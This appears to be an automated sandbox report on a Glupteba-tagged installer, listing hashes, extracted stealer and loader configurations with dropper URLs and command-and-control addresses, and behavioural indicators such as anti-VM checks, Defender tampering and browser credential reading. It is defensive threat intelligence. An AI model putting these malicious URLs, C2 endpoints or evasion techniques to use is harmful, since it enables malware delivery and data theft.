glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (2).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

45.14.49.200:27625

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

dibild

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

95.181.172.100:6795

Extracted

Family

redline

Botnet

@Gerhdhd

46.8.19.177:41228

Extracted

Family

redline

Botnet

20_8_rs

jekorikani.xyz:80

Extracted

Family

vidar

Version

40.1

Botnet

937

https://eduarroma.tumblr.com/

Attributes

profile_id
937

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral24/memory/3008-373-0x00000000049A0000-0x00000000052C6000-memory.dmp	family_glupteba
behavioral24/memory/3008-390-0x0000000000400000-0x00000000027DB000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5832	5784	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5924	5784	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7216	5784	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	5784	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 15 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe	family_redline
C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe	family_redline
behavioral24/memory/4964-282-0x0000000000418F7A-mapping.dmp	family_redline
behavioral24/memory/4988-340-0x0000000004C90000-0x0000000005296000-memory.dmp	family_redline
behavioral24/memory/5004-349-0x0000000005180000-0x0000000005786000-memory.dmp	family_redline
behavioral24/memory/4964-336-0x0000000005000000-0x0000000005606000-memory.dmp	family_redline
behavioral24/memory/4996-290-0x000000000041905A-mapping.dmp	family_redline
behavioral24/memory/4988-288-0x0000000000418F76-mapping.dmp	family_redline
behavioral24/memory/5004-293-0x0000000000418E52-mapping.dmp	family_redline
behavioral24/memory/5004-285-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral24/memory/4996-284-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral24/memory/4988-283-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral24/memory/4964-278-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe	family_redline
C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral24/memory/1972-379-0x0000000004940000-0x00000000049DD000-memory.dmp	family_vidar
behavioral24/memory/1972-394-0x0000000000400000-0x0000000002D0E000-memory.dmp	family_vidar

Blocklisted process makes network request 2 IoCs

Processes:

cmd.exe

flow pid process

135 4412 cmd.exe
141 4412 cmd.exe
Downloads MZ/PE file

flow	pid	process
135	4412	cmd.exe
141	4412	cmd.exe

Executes dropped EXE 33 IoCs

Processes:

NO5P176fhXgDBZjHRkQsEvWf.exe0pZVLUVR63Tztm7oZQCP50pT.exejofjsUkJjOeCP4yDpBx9DmvG.exezbXVIB49xC1RGNSfMJuiVQNh.exe7ZpH1YJjEZ1iBO5uknAQ4wyO.exeJUEfkxuAALb76So533ZEiWsM.exeXuz8Dk1AiXq6ZpUU1uwydzzF.exeLeIoRzLd2z_6piMMrwMWHPMP.exere5gXSGRiSUASR4uA61S4_z8.exexuvxPIejRv6FztmHksPMcUKl.exeKC9LoCJcdUlMD1HGU_5_Oqj8.exegJOjTgHStPQhjAPFhilDMUye.exe8SSQnh8VJ2ZXOMB2EVdhfqtx.exeVocvqYrjv0PS50F7XnxrJjCi.exeeO17TiqSlEJ1ki0TevpMPIiI.exedwr1rb3LIc9d6jn95bW9DZDk.exe1k_UiTYE1VIS1RgaeGXD9h_B.exeDOD0VThr9ITNo52pPJVzHQFK.exeqcGb9v5y7YVfJDE6kI5XCMnU.exe64AAZ3NFn1v4pDaF45SgvCVe.exe1LamdEUrG0vln5Y6X8JO8T2X.exex6wZkgQfsAq3vmu6gLRSnJ8j.exejooyu.exemd8_8eus.execustomer3.exex6wZkgQfsAq3vmu6gLRSnJ8j.tmp8SSQnh8VJ2ZXOMB2EVdhfqtx.exe7ZpH1YJjEZ1iBO5uknAQ4wyO.exejofjsUkJjOeCP4yDpBx9DmvG.exeXuz8Dk1AiXq6ZpUU1uwydzzF.exeWerFault.exejfiag3g_gg.exe8389294.exe

pid	process
1592	NO5P176fhXgDBZjHRkQsEvWf.exe
3408	0pZVLUVR63Tztm7oZQCP50pT.exe
3624	jofjsUkJjOeCP4yDpBx9DmvG.exe
1900	zbXVIB49xC1RGNSfMJuiVQNh.exe
388	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
60	JUEfkxuAALb76So533ZEiWsM.exe
4012	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
2160	LeIoRzLd2z_6piMMrwMWHPMP.exe
2664	re5gXSGRiSUASR4uA61S4_z8.exe
2656	xuvxPIejRv6FztmHksPMcUKl.exe
3008	KC9LoCJcdUlMD1HGU_5_Oqj8.exe
3568	gJOjTgHStPQhjAPFhilDMUye.exe
3948	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
2180	VocvqYrjv0PS50F7XnxrJjCi.exe
400	eO17TiqSlEJ1ki0TevpMPIiI.exe
3120	dwr1rb3LIc9d6jn95bW9DZDk.exe
780	1k_UiTYE1VIS1RgaeGXD9h_B.exe
1972	DOD0VThr9ITNo52pPJVzHQFK.exe
3680	qcGb9v5y7YVfJDE6kI5XCMnU.exe
3696	64AAZ3NFn1v4pDaF45SgvCVe.exe
3088	1LamdEUrG0vln5Y6X8JO8T2X.exe
4156	x6wZkgQfsAq3vmu6gLRSnJ8j.exe
4380	jooyu.exe
4412	md8_8eus.exe
4456	customer3.exe
4480	x6wZkgQfsAq3vmu6gLRSnJ8j.tmp
4964	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
4988	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
4996	jofjsUkJjOeCP4yDpBx9DmvG.exe
5004	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
4788	WerFault.exe
4240	jfiag3g_gg.exe
4372	8389294.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

64AAZ3NFn1v4pDaF45SgvCVe.exexuvxPIejRv6FztmHksPMcUKl.exe0pZVLUVR63Tztm7oZQCP50pT.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	64AAZ3NFn1v4pDaF45SgvCVe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	64AAZ3NFn1v4pDaF45SgvCVe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	xuvxPIejRv6FztmHksPMcUKl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	xuvxPIejRv6FztmHksPMcUKl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0pZVLUVR63Tztm7oZQCP50pT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0pZVLUVR63Tztm7oZQCP50pT.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup (2).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (2).exe

Loads dropped DLL 2 IoCs

Processes:

x6wZkgQfsAq3vmu6gLRSnJ8j.tmp

pid process

4480 x6wZkgQfsAq3vmu6gLRSnJ8j.tmp
4480 x6wZkgQfsAq3vmu6gLRSnJ8j.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4480	x6wZkgQfsAq3vmu6gLRSnJ8j.tmp
4480	x6wZkgQfsAq3vmu6gLRSnJ8j.tmp

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe	themida
C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe	themida
C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe	themida
C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe	themida
C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe	themida
behavioral24/memory/3696-245-0x0000000000E80000-0x0000000000E81000-memory.dmp	themida
behavioral24/memory/2656-256-0x0000000000B60000-0x0000000000B61000-memory.dmp	themida
behavioral24/memory/3408-286-0x0000000000D20000-0x0000000000D21000-memory.dmp	themida
C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe	themida
C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe	themida
C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

64AAZ3NFn1v4pDaF45SgvCVe.exexuvxPIejRv6FztmHksPMcUKl.exe0pZVLUVR63Tztm7oZQCP50pT.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	64AAZ3NFn1v4pDaF45SgvCVe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	xuvxPIejRv6FztmHksPMcUKl.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0pZVLUVR63Tztm7oZQCP50pT.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
33	api.db-ip.com
214	ipinfo.io
366	ipinfo.io
208	ipinfo.io
134	ipinfo.io
198	ipinfo.io
201	ipinfo.io
28	ipinfo.io
143	ip-api.com
211	ipinfo.io
361	ipinfo.io
367	ip-api.com
29	ipinfo.io
32	api.db-ip.com
132	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

xuvxPIejRv6FztmHksPMcUKl.exe64AAZ3NFn1v4pDaF45SgvCVe.exe0pZVLUVR63Tztm7oZQCP50pT.exe

pid process

2656 xuvxPIejRv6FztmHksPMcUKl.exe
3696 64AAZ3NFn1v4pDaF45SgvCVe.exe
3408 0pZVLUVR63Tztm7oZQCP50pT.exe

pid	process
2656	xuvxPIejRv6FztmHksPMcUKl.exe
3696	64AAZ3NFn1v4pDaF45SgvCVe.exe
3408	0pZVLUVR63Tztm7oZQCP50pT.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

8SSQnh8VJ2ZXOMB2EVdhfqtx.exe7ZpH1YJjEZ1iBO5uknAQ4wyO.exejofjsUkJjOeCP4yDpBx9DmvG.exeWerFault.exe

description	pid	process	target process
PID 3948 set thread context of 4964	3948	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
PID 388 set thread context of 4988	388	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
PID 3624 set thread context of 4996	3624	jofjsUkJjOeCP4yDpBx9DmvG.exe	jofjsUkJjOeCP4yDpBx9DmvG.exe
PID 4012 set thread context of 5004	4012	WerFault.exe	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe

Drops file in Program Files directory 5 IoCs

Processes:

qcGb9v5y7YVfJDE6kI5XCMnU.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	qcGb9v5y7YVfJDE6kI5XCMnU.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	qcGb9v5y7YVfJDE6kI5XCMnU.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 36 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5100	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
5064	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
4012	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
3012	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
4176	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
3092	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
4492	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
3012	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
5256	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
5780	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
5760	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
5968	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
6052	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
6100	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
5228	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
2360	780	WerFault.exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
3904	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
2624	3120	WerFault.exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
6036	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
2716	4456	WerFault.exe	customer3.exe
5224	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
4356	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
5324	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
5160	1972	WerFault.exe	DOD0VThr9ITNo52pPJVzHQFK.exe
6560	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7016	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
6120	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
5220	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
6540	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
5568	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
4792	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
4788	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
864	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7748	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7380	6580	WerFault.exe	z6bB2x5nAcREXc8NvL2R0HNc.exe
7376	916	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

gJOjTgHStPQhjAPFhilDMUye.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gJOjTgHStPQhjAPFhilDMUye.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gJOjTgHStPQhjAPFhilDMUye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gJOjTgHStPQhjAPFhilDMUye.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

9044 schtasks.exe
6968 schtasks.exe
5028 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

7900 taskkill.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

8496 PING.EXE
8836 PING.EXE

pid	process
9044	schtasks.exe
6968	schtasks.exe
5028	schtasks.exe

pid	process
7900	taskkill.exe

pid	process
8496	PING.EXE
8836	PING.EXE

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	204	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	207	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	363	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	378	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	133	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	140	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	199	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

Setup (2).exegJOjTgHStPQhjAPFhilDMUye.exeWerFault.exeWerFault.exe

pid	process
1752	Setup (2).exe
1752	Setup (2).exe
3568	gJOjTgHStPQhjAPFhilDMUye.exe
3568	gJOjTgHStPQhjAPFhilDMUye.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5064	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
5100	WerFault.exe
1392
1392

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

gJOjTgHStPQhjAPFhilDMUye.exe

pid process

3568 gJOjTgHStPQhjAPFhilDMUye.exe

pid	process
3568	gJOjTgHStPQhjAPFhilDMUye.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

zbXVIB49xC1RGNSfMJuiVQNh.exeJUEfkxuAALb76So533ZEiWsM.exeNO5P176fhXgDBZjHRkQsEvWf.exe64AAZ3NFn1v4pDaF45SgvCVe.exejofjsUkJjOeCP4yDpBx9DmvG.exexuvxPIejRv6FztmHksPMcUKl.exeWerFault.exe7ZpH1YJjEZ1iBO5uknAQ4wyO.exe8SSQnh8VJ2ZXOMB2EVdhfqtx.exeXuz8Dk1AiXq6ZpUU1uwydzzF.exe0pZVLUVR63Tztm7oZQCP50pT.exeWerFault.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1900	zbXVIB49xC1RGNSfMJuiVQNh.exe
Token: SeDebugPrivilege	60	JUEfkxuAALb76So533ZEiWsM.exe
Token: SeDebugPrivilege	1592	NO5P176fhXgDBZjHRkQsEvWf.exe
Token: SeDebugPrivilege	3696	64AAZ3NFn1v4pDaF45SgvCVe.exe
Token: SeDebugPrivilege	4996	jofjsUkJjOeCP4yDpBx9DmvG.exe
Token: SeDebugPrivilege	2656	xuvxPIejRv6FztmHksPMcUKl.exe
Token: SeRestorePrivilege	5064	WerFault.exe
Token: SeBackupPrivilege	5064	WerFault.exe
Token: SeDebugPrivilege	4988	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
Token: SeDebugPrivilege	4964	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
Token: SeDebugPrivilege	5004	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
Token: SeDebugPrivilege	3408	0pZVLUVR63Tztm7oZQCP50pT.exe
Token: SeDebugPrivilege	5064	WerFault.exe
Token: SeDebugPrivilege	5100	WerFault.exe
Token: SeDebugPrivilege	1620	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

x6wZkgQfsAq3vmu6gLRSnJ8j.tmp

pid process

4480 x6wZkgQfsAq3vmu6gLRSnJ8j.tmp

pid	process
4480	x6wZkgQfsAq3vmu6gLRSnJ8j.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (2).exe

description	pid	process	target process
PID 1752 wrote to memory of 1592	1752	Setup (2).exe	NO5P176fhXgDBZjHRkQsEvWf.exe
PID 1752 wrote to memory of 1592	1752	Setup (2).exe	NO5P176fhXgDBZjHRkQsEvWf.exe
PID 1752 wrote to memory of 1592	1752	Setup (2).exe	NO5P176fhXgDBZjHRkQsEvWf.exe
PID 1752 wrote to memory of 3948	1752	Setup (2).exe	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
PID 1752 wrote to memory of 3948	1752	Setup (2).exe	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
PID 1752 wrote to memory of 3948	1752	Setup (2).exe	8SSQnh8VJ2ZXOMB2EVdhfqtx.exe
PID 1752 wrote to memory of 4012	1752	Setup (2).exe	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
PID 1752 wrote to memory of 4012	1752	Setup (2).exe	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
PID 1752 wrote to memory of 4012	1752	Setup (2).exe	Xuz8Dk1AiXq6ZpUU1uwydzzF.exe
PID 1752 wrote to memory of 60	1752	Setup (2).exe	JUEfkxuAALb76So533ZEiWsM.exe
PID 1752 wrote to memory of 60	1752	Setup (2).exe	JUEfkxuAALb76So533ZEiWsM.exe
PID 1752 wrote to memory of 60	1752	Setup (2).exe	JUEfkxuAALb76So533ZEiWsM.exe
PID 1752 wrote to memory of 388	1752	Setup (2).exe	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
PID 1752 wrote to memory of 388	1752	Setup (2).exe	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
PID 1752 wrote to memory of 388	1752	Setup (2).exe	7ZpH1YJjEZ1iBO5uknAQ4wyO.exe
PID 1752 wrote to memory of 3408	1752	Setup (2).exe	0pZVLUVR63Tztm7oZQCP50pT.exe
PID 1752 wrote to memory of 3408	1752	Setup (2).exe	0pZVLUVR63Tztm7oZQCP50pT.exe
PID 1752 wrote to memory of 3408	1752	Setup (2).exe	0pZVLUVR63Tztm7oZQCP50pT.exe
PID 1752 wrote to memory of 3624	1752	Setup (2).exe	jofjsUkJjOeCP4yDpBx9DmvG.exe
PID 1752 wrote to memory of 3624	1752	Setup (2).exe	jofjsUkJjOeCP4yDpBx9DmvG.exe
PID 1752 wrote to memory of 3624	1752	Setup (2).exe	jofjsUkJjOeCP4yDpBx9DmvG.exe
PID 1752 wrote to memory of 1900	1752	Setup (2).exe	zbXVIB49xC1RGNSfMJuiVQNh.exe
PID 1752 wrote to memory of 1900	1752	Setup (2).exe	zbXVIB49xC1RGNSfMJuiVQNh.exe
PID 1752 wrote to memory of 2160	1752	Setup (2).exe	LeIoRzLd2z_6piMMrwMWHPMP.exe
PID 1752 wrote to memory of 2160	1752	Setup (2).exe	LeIoRzLd2z_6piMMrwMWHPMP.exe
PID 1752 wrote to memory of 2656	1752	Setup (2).exe	xuvxPIejRv6FztmHksPMcUKl.exe
PID 1752 wrote to memory of 2656	1752	Setup (2).exe	xuvxPIejRv6FztmHksPMcUKl.exe
PID 1752 wrote to memory of 2656	1752	Setup (2).exe	xuvxPIejRv6FztmHksPMcUKl.exe
PID 1752 wrote to memory of 2664	1752	Setup (2).exe	re5gXSGRiSUASR4uA61S4_z8.exe
PID 1752 wrote to memory of 2664	1752	Setup (2).exe	re5gXSGRiSUASR4uA61S4_z8.exe
PID 1752 wrote to memory of 2664	1752	Setup (2).exe	re5gXSGRiSUASR4uA61S4_z8.exe
PID 1752 wrote to memory of 3008	1752	Setup (2).exe	KC9LoCJcdUlMD1HGU_5_Oqj8.exe
PID 1752 wrote to memory of 3008	1752	Setup (2).exe	KC9LoCJcdUlMD1HGU_5_Oqj8.exe
PID 1752 wrote to memory of 3008	1752	Setup (2).exe	KC9LoCJcdUlMD1HGU_5_Oqj8.exe
PID 1752 wrote to memory of 3568	1752	Setup (2).exe	gJOjTgHStPQhjAPFhilDMUye.exe
PID 1752 wrote to memory of 3568	1752	Setup (2).exe	gJOjTgHStPQhjAPFhilDMUye.exe
PID 1752 wrote to memory of 3568	1752	Setup (2).exe	gJOjTgHStPQhjAPFhilDMUye.exe
PID 1752 wrote to memory of 2180	1752	Setup (2).exe	VocvqYrjv0PS50F7XnxrJjCi.exe
PID 1752 wrote to memory of 2180	1752	Setup (2).exe	VocvqYrjv0PS50F7XnxrJjCi.exe
PID 1752 wrote to memory of 2180	1752	Setup (2).exe	VocvqYrjv0PS50F7XnxrJjCi.exe
PID 1752 wrote to memory of 3120	1752	Setup (2).exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
PID 1752 wrote to memory of 3120	1752	Setup (2).exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
PID 1752 wrote to memory of 3120	1752	Setup (2).exe	dwr1rb3LIc9d6jn95bW9DZDk.exe
PID 1752 wrote to memory of 400	1752	Setup (2).exe	eO17TiqSlEJ1ki0TevpMPIiI.exe
PID 1752 wrote to memory of 400	1752	Setup (2).exe	eO17TiqSlEJ1ki0TevpMPIiI.exe
PID 1752 wrote to memory of 400	1752	Setup (2).exe	eO17TiqSlEJ1ki0TevpMPIiI.exe
PID 1752 wrote to memory of 780	1752	Setup (2).exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
PID 1752 wrote to memory of 780	1752	Setup (2).exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
PID 1752 wrote to memory of 780	1752	Setup (2).exe	1k_UiTYE1VIS1RgaeGXD9h_B.exe
PID 1752 wrote to memory of 1972	1752	Setup (2).exe	DOD0VThr9ITNo52pPJVzHQFK.exe
PID 1752 wrote to memory of 1972	1752	Setup (2).exe	DOD0VThr9ITNo52pPJVzHQFK.exe
